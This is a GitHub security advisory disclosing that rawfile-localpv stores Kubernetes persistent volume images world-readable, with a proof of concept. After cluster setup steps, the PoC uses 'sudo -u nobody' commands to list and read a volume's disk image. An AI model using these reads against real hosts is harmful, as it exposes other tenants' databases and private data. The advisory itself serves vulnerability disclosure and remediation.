Skip to content

Persistent volume data are world readable and that would allow non-privileged users to access sensitive data such as databases of k8s workload

Moderate
tiagolobocastro published GHSA-wh95-vw4r-xwx4 Jun 19, 2025

Package

rawfile-localpv

Affected versions

< v0.9.0

Patched versions

>= v0.10.0

Description

Summary

Downstream advisory: https://github.com/canonical/k8s-snap/security/advisories/GHSA-5547-57qq-wmgw (private)

The rawfile-localpv (https://github.com/openebs/rawfile-localpv) storage class creates persistent volume data under /var/csi/rawfile/ on Kubernetes hosts by default. However, the directory and data in it are world-readable. It allows non-privileged users (such as nobody in the following example) to access the whole persistent volume data, and those can include sensitive information such as a whole database if the Kubernetes tenants are running MySQL or PostgreSQL in a container so it could lead to a database breach.

Details

$ sudo -u nobody ls -alFh /var/csi/rawfile/
total 12K
drwxr-xr-x 3 root root 4.0K Apr  8 14:46 ./
drwxr-xr-x 3 root root 4.0K Apr  8 14:30 ../
drwxr-xr-x 2 root root 4.0K Apr  8 14:46 pvc-2844d93c-540d-4ebe-a66b-ae92e54f7d53/

$ sudo -u nobody ls -alFh /var/csi/rawfile/pvc-2844d93c-540d-4ebe-a66b-ae92e54f7d53/
total 33M
drwxr-xr-x 2 root root 4.0K Apr  8 14:46 ./
drwxr-xr-x 3 root root 4.0K Apr  8 14:46 ../
-rw-r--r-- 1 root root 1.0G Apr  8 14:51 disk.img
-rw-r--r-- 1 root root  203 Apr  8 14:46 disk.meta

-> readable by unprivileged user such as nobody

PoC

[as an admin user, set up a Kubernetes cluster as follows]

Prepare a Ubuntu 24.04 LTS VM or a clean environment.

Run the following steps to have Kubeadm + Cilium + rawfile-localpv.

## Based on https://kubernetes.io/docs/setup/production-environment/tools/kubeadm/

## containerd
sudo apt-get update
sudo apt-get install containerd -y

cat <<EOF | sudo tee /etc/sysctl.d/k8s.conf
net.ipv4.ip_forward = 1
EOF
sudo sysctl --system

sudo install -d -m 0750 /etc/containerd/
containerd config default | sudo tee /etc/containerd/config.toml
sudo sed -i \
    -e "s/\(SystemdCgroup =\) .*/\1 true/" \
    -e "s/\(sandbox_image =\) .*/\1 \"registry.k8s.io\/pause:3.10\"/" \
    /etc/containerd/config.toml
sudo systemctl restart containerd.service

## kubeadm, kubectl, kubelet
sudo apt-get install -y apt-transport-https ca-certificates curl gpg
curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.32/deb/Release.key | sudo gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg
echo "deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.32/deb/ /" | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo apt-get update
sudo apt-get install -y kubelet kubeadm kubectl
sudo apt-mark hold kubelet kubeadm kubectl

sudo kubeadm init

mkdir -p $HOME/.kube
sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config
sudo chown $(id -u):$(id -g) $HOME/.kube/config

kubectl taint nodes --all node-role.kubernetes.io/control-plane-
kubectl label nodes --all node.kubernetes.io/exclude-from-external-load-balancers-

curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash

## Cilium
helm repo add cilium https://helm.cilium.io/
helm install cilium cilium/cilium --version 1.17.2 --namespace kube-system --set operator.replicas=1

# rawfile-localpv
git clone --depth=1 https://github.com/openebs/rawfile-localpv.git
helm install -n kube-system rawfile-csi ./rawfile-localpv/deploy/charts/rawfile-csi/

kubectl patch storageclass rawfile-localpv -p '{"metadata": {"annotations":{"storageclass.kubernetes.io/is-default-class":"true"}}}'

Create a persistent volume.

$ cat <<EOF | kubectl apply -f -
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: myclaim
spec:
  accessModes:
    - ReadWriteOnce
  volumeMode: Filesystem
  resources:
    requests:
      storage: 1Gi
---
kind: Pod
apiVersion: v1
metadata:
  name: storage-writer-pod
  labels:
    k8s-app: storage-writer-pod
spec:
  containers:
    - name: storage-writer-container
      image: busybox
      command:
        ["/bin/sh", "-c", "while true; do echo LOREM IPSUM $(date) | tee -a /mnt/dates; sleep 2; done"]
      volumeMounts:
        - name: storage-volume
          mountPath: "/mnt"
  restartPolicy: "Never"
  volumes:
    - name: storage-volume
      persistentVolumeClaim:
        claimName: myclaim
EOF

[as a local unprivileged user, do the following to find and read the data]

$ sudo -u nobody ls -alFh /var/csi/rawfile/
total 12K
drwxr-xr-x 3 root root 4.0K Apr  8 14:46 ./
drwxr-xr-x 3 root root 4.0K Apr  8 14:30 ../
drwxr-xr-x 2 root root 4.0K Apr  8 14:46 pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/

$ sudo -u nobody file /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img
/var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img: Linux rev 1.0 ext4 filesystem data, UUID=04c198cc-efb8-45be-b8e8-568b02626e87 (needs journal recovery) (extents) (64bit) (large files) (huge files)

$ sudo -u nobody qemu-img info /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img
image: /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img
file format: raw
virtual size: 1 GiB (1073741824 bytes)
disk size: 32.7 MiB
Child node '/file':
    filename: /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img
    protocol type: file
    file length: 1 GiB (1073741824 bytes)
    disk size: 32.7 MiB

$ sudo -u nobody head -c 500000000 /var/csi/rawfile/pvc-f5fdabe0-6caf-4a2c-aecc-3b55d75b0696/disk.img | strings | head
/mnt
lost+found
dates
LOREM IPSUM Sat Apr 5 07:50:01 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:03 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:05 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:07 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:09 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:11 UTC 2025
LOREM IPSUM Sat Apr 5 07:50:13 UTC 2025

-> the content of persistent volumes are readable and visible to unprivileged user

Impact

What kind of vulnerability is it? Who is impacted?
It requires a local unprivileged login to the Kubernetes host. But once it's the case, persistent volume data could have some sensitive information including a data base from a workload such as a whole MySQL or PostgreSQL database.

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE ID

CVE-2025-58061

Weaknesses

No CWEs

Credits